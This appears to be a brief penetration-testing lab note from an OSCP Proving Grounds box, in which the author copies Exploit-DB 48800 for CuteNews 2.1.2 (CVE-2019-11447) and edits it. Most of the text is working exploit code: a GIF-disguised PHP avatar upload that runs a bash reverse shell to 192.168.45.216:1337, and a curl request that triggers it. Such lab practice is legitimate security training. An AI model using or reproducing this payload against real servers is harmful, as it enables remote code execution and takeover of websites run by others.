adot@pwnbox:~/oscp/provinggrounds/easy/bbscute$ searchsploit -m 48800
Exploit: CuteNews 2.1.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/48800
Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
Codes: CVE-2019-11447
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/adot/oscp/provinggrounds/easy/bbscute/48800.py
Edit script to remove the /CuteNews web dir so everything is running off the root dir of the website
payload = f'''GIF89a;\n<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.216/1337 0>&1'");?>'''.encode()
payload_send = sess.post(f"{ip}/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
os.system("curl " + (f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php"))
